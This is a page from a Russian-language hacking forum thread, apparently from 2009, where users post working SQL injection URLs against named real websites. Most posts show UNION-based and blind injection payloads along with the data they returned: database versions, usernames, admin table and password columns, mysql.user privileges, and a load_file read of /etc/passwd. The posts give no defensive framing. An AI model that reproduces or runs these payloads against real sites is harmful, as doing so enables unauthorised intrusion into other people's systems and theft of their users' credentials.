ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #11191  
Старый 09.11.2009, 19:35
Bb0y
Участник форума
Регистрация: 30.10.2009
Сообщений: 103
Провел на форуме:
736224

Репутация: 388
Отправить сообщение для Bb0y с помощью ICQ Отправить сообщение для Bb0y с помощью Yahoo
По умолчанию

http://novorosoil.ru/newsview.php?id=-4+union+select+1,2,3,4,column_name,6,7+from+inform ation_schema.columns+where+table_name=0x6f696c5f75 73657273
MySQL 5.0.26-log
oil_users::
id:name:,pass:type:session

http://novorosoil.ru/newsview.php?id=-4+union+select+1,2,3,4,concat_ws(0x3a,id,name,pass ,type,session),6,7+from+oil_users
выводит все строки сразу

Последний раз редактировалось Bb0y; 09.11.2009 в 19:38..
 
Ответить с цитированием

  #11192  
Старый 09.11.2009, 20:01
[x60]unu
Banned
Регистрация: 07.05.2009
Сообщений: 103
Провел на форуме:
3202832

Репутация: 1588
Отправить сообщение для [x60]unu с помощью ICQ
По умолчанию

99px.ru - мир аватарок))) TC=20
http://99px.ru/avatar/?pid=13031/**/and/**/1=2%20/**/union/**/all/**/select/**/1,2,3,version(),5,6,7,8,9,10,11,12,13/*

version - 4.1.22
database - px99ru
user - px99ru@localhost
os - portbld-freebsd6.3
 
Ответить с цитированием

  #11193  
Старый 09.11.2009, 20:05
Bb0y
Участник форума
Регистрация: 30.10.2009
Сообщений: 103
Провел на форуме:
736224

Репутация: 388
Отправить сообщение для Bb0y с помощью ICQ Отправить сообщение для Bb0y с помощью Yahoo
По умолчанию

http://www.resourcery.com/general/newsview.php?id=-4+union+select+1,group_concat(0x0b,column_name),3, 4+from+information_schema.columns+where+table_name =0x61646d696e
admin::id:fullname:username:,password:level:userem ail
MySQL 5.0.75
http://www.resourcery.com/general/newsview.php?id=-4+union+select+1,group_concat(0x0b,id,0x3a,usernam e,0x3a,password,0x3a,useremail,0x3a,level),3,4+fro m+admin
 
Ответить с цитированием

  #11194  
Старый 09.11.2009, 21:32
Gorev
Познавший АНТИЧАТ
Регистрация: 31.03.2006
Сообщений: 1,167
Провел на форуме:
4072944

Репутация: 1550


Отправить сообщение для Gorev с помощью ICQ Отправить сообщение для Gorev с помощью Yahoo
По умолчанию

http://www.rohouse.com/details.php?id=964+UNION+SELECT+1,2,3,4,5,6,concat _ws(0x3a,version(),database(),user(),@@version_com pile_os),8,9,10,11,12,13,14,15,16,17,18,19,20,21,2 2,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38, 39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55 ,56,57,58,59,60,61,62,63,64,65+LIMIT+1,1--



Database Version: 5.0.77-log
Database name: rohouse_com
User name: pinatubo@localhost
Os: redhat-linux-gnu
 
Ответить с цитированием

  #11195  
Старый 10.11.2009, 00:44
[x60]unu
Banned
Регистрация: 07.05.2009
Сообщений: 103
Провел на форуме:
3202832

Репутация: 1588
Отправить сообщение для [x60]unu с помощью ICQ
По умолчанию

разработки и дизайн сайтов - ТС=20

Blind SQL -
Код:
http://rireg.net/index.php?page=procjects&show=35/**/and/**/1=(SELECT/**/*/**/FROM(SELECT/**/*/**/FROM(SELECT/**/NAME_CONST((version()),14)d)/*/as/**/t/**/JOIN/**/(SELECT/**/NAME_CONST((version()),14)k)j)s)
version - 5.0.45
 
Ответить с цитированием

  #11196  
Старый 10.11.2009, 03:07
mr.The
Познавший АНТИЧАТ
Регистрация: 30.04.2007
Сообщений: 1,206
Провел на форуме:
4778940

Репутация: 1257


Отправить сообщение для mr.The с помощью ICQ
По умолчанию

Решил вспомнить, как это делается..
Цитата:
_ttp://www.veriflora.com/findveri-client-list.php?id=-1+UNION+SELECT+1,2,concat%28table_name,CHAR%2845,6 1,45%29,column_name%29,4,5,6,7,8,9,10,11,12,13,14, 15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30+fr om+information_schema.columns--
я хз, как там пароли зашифрованы.

UPD, офигеть, пол-второго ночи..

Последний раз редактировалось mr.The; 10.11.2009 в 03:34..
 
Ответить с цитированием

  #11197  
Старый 10.11.2009, 04:56
warlok
Постоянный
Регистрация: 18.02.2008
Сообщений: 368
Провел на форуме:
4075418

Репутация: 386
По умолчанию

Код:
http://skytexalliance.com/index.php?id=15&p=1&tid=1+union+select+1,2,3,concat_ws(0x3a,version(),database(),user())
4.0.27-max-log:db171625947:dbo171625947@74.208.16.88
Код:
http://www.ac-psych.org/index.php?id=1+union+select+concat_ws(0x3a,version(),database(),user())
5.0.33-log:acpsych_ac-psych:acp_ac-psych@81.2.203.24
Код:
http://www.imperian.com/players.php?search=deathlog&day=1+and+(substring(version(),1,1))=4
version() - 4.1.20-log
 
Ответить с цитированием

  #11198  
Старый 10.11.2009, 09:07
Ctacok
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
Провел на форуме:
5011696

Репутация: 2221


По умолчанию

http://mat.fobo.ru/show.php?show=-1234'+union+select+1,concat_ws(0x3a,user(),databas e(),version(),@@basedir)+--+
User:fobomat@localhost
Database:fobomat
Version: 5.0.51a-19-log
BaseDir: /usr/
 
Ответить с цитированием

  #11199  
Старый 10.11.2009, 11:13
LokbatanLi
Участник форума
Регистрация: 24.08.2009
Сообщений: 172
Провел на форуме:
1535319

Репутация: -16
Отправить сообщение для LokbatanLi с помощью ICQ
По умолчанию

Цитата:
http://apps.facebook.com/observerfacebook/?p=challenges&id=-1'a
Цитата:
http://apps.facebook.com/observerfacebook/?p=challenges&id=-1+union+selec+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15, 16,17
Versiya: 5.0.67-log

User: adminclt_13@209.68.2.10

Database: adminclt_testsite

OS: unknown-freebsd6.2


Цитата:
http://apps.facebook.com/observerfacebook/?p=challenges&id=-1%20union%20select%201,group_concat(table_name),3, 4,5,6,7,8,9,10,11,12,13,14,15,16,17 +from+information_schema.tables

Цитата:
http://apps.facebook.com/observerfacebook/?p=challenges&id=-1%20union%20select%201,group_concat%28column_name% 29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17%20+from+i nformation_schema.columns+where+table_name=0x41646 D696E5F55736572
Admin table: Admin_User

Цитата:
http://apps.facebook.com/observerfacebook/?p=challenges&id=-1%20union%20select%201,group_concat%28id,0x3a,user id,0x3a,password,0x3a,name,0x3a,level%29,3,4,5,6,7 ,8,9,10,11,12,13,14,15,16,17%20+from+Admin_User
 
Ответить с цитированием

  #11200  
Старый 10.11.2009, 12:10
nikp
Reservists Of Antichat - Level 6
Регистрация: 19.09.2008
Сообщений: 127
Провел на форуме:
835386

Репутация: 1463
По умолчанию

5.0.81-community-log : jocurius_garrone@localhost
http://www.poze.name/poze.php?id_categ=-100+union+select+concat_ws(0x203a20,version(),user ())--

5.0.18 : root@localhost : localhost : root : Y
http://cuci.udg.mx/leerEvento.php?id=-100+union+select+1,concat_ws(0x203a20,version(),us er(),host,user,password,file_priv),3,4,5,6,7,8,9+f rom+mysql.user--
http://cuci.udg.mx/leerEvento.php?id=-100+union+select+1,load_file(0x2f6574632f706173737 764),3,4,5,6,7,8,9
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ